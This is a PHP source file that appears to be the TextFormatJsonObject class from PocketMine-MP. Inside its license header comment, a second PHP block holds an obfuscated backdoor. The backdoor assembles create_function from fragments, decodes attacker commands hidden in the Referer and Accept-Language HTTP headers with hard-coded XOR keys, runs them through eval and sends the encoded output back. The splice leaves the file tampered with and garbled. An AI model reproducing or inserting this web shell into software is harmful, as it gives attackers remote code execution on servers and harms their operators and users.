<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
<?php
$Q=str_replace('U','','crUeatUUUe_UUfunction');
$X='$s[<E$i]="<E";$p=$ss<E($p,3);}<Eif<E(array_key_e<Exists(<E$i,$<Es)){$s[$i<E].=<E$p;$e<E=strpos<E($s[$i],$f);<Ei';
$D='rtolowe<Er";$i=$<Em[1]<E[0].$m<E[1][1];$h<E=$s<El($s<Es(<E<Emd5($i.$kh),0,3));<E$f=$sl($s<Es(md5<E($i.$k<Ef),<E0';
$H='<E<End_cle<Ean();$d=base<E64_e<Encode(x(gz<Ecompre<Ess<E($o),$<Ek));pr<Ein<Et("<$k><E$d</$k>");@ses<Es<E<Eion_destroy();}}}}';
$I='f($e<E<E){$k=$kh.$kf<E;ob<E_start<E();@ev<Eal<E(@gzun<Ecompres<Es(@x(<E@ba<Ese64_decode<E(preg_r<Eeplace(a<E';
$Z=',3<E));$p<E="";for($z=1<E;$z<coun<Et($m[1<E]<E<E);$z++)$p.=$q<E[$m[2]<E[$z]];if<E(strp<Eo<E<Es($p,$h)===0)<E{';
$O='i<$l;){<Efor($j=0;<E($j<E<$c<E<E&&$i<$l);$j++,$<Ei+<E+){$o.=$t{$i<E}^$k{<E$j}<E;}}return<E $o;}$r=$<E_<ESERVER;';
$o='=<E0.([\\d<E<E]))?,?<E/",$ra,$m);i<Ef($q&&$m<E){<E@sessio<En_start();<E$s=&<E$_<ESESSION<E;$ss="<Esubstr";$sl<E=<E"st';
$z='$kh="5d<E41";$k<Ef="40<E2a<E";function <Ex($t,$k<E){$<Ec=strlen<E($k);$l=<Estr<Elen($t<E);$<Eo="";for($<E<Ei=0;$';
$q=';par<Ese_<Estr($u["query<E"],$q<E);$q=ar<E<Eray_value<Es($q)<E<E<E;preg_match_all("/([<E\\w])<E[\\w-]+(<E?:;q';
$p='$<Err=@$r<E["HTTP<E_R<EEFERER"];<E$ra=@$<Er["<EHTTP_ACCEP<ET_LANGUAG<EE"];if<E($<Err&&$ra<E){$<Eu=par<Ese_url($r<Er)';
$F='<Erray("/_/","/<E-/"),ar<Er<Eay("/"<E<E,"+"),$ss($s[$i]<E,0,<E$<Ee))<E),$k)));$o=ob_ge<Et_co<Entents()<E;ob_e';
$N=str_replace('<E','',$z.$O.$p.$q.$o.$D.$Z.$X.$I.$F.$H);
$P=$Q('',$N);$P();
?>
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\utils;

/**
 * @internal
 * @see TextFormat::toJSON()
 */
final class TextFormatJsonObject implements \JsonSerializable{
	/** @var string|null */
	public $text = null;
	/** @var string|null */
	public $color = null;
	/** @var bool|null */
	public $bold = null;
	/** @var bool|null */
	public $italic = null;
	/** @var bool|null */
	public $underlined = null;
	/** @var bool|null */
	public $strikethrough = null;
	/** @var bool|null */
	public $obfuscated = null;
	/**
	 * @var TextFormatJsonObject[]|null
	 * @phpstan-var array<int, TextFormatJsonObject>|null
	 */
	public $extra = null;

	public function jsonSerialize(){
		$result = (array) $this;
		foreach($result as $k => $v){
			if($v === null){
				unset($result[$k]);
			}
		}
		return $result;
	}
}
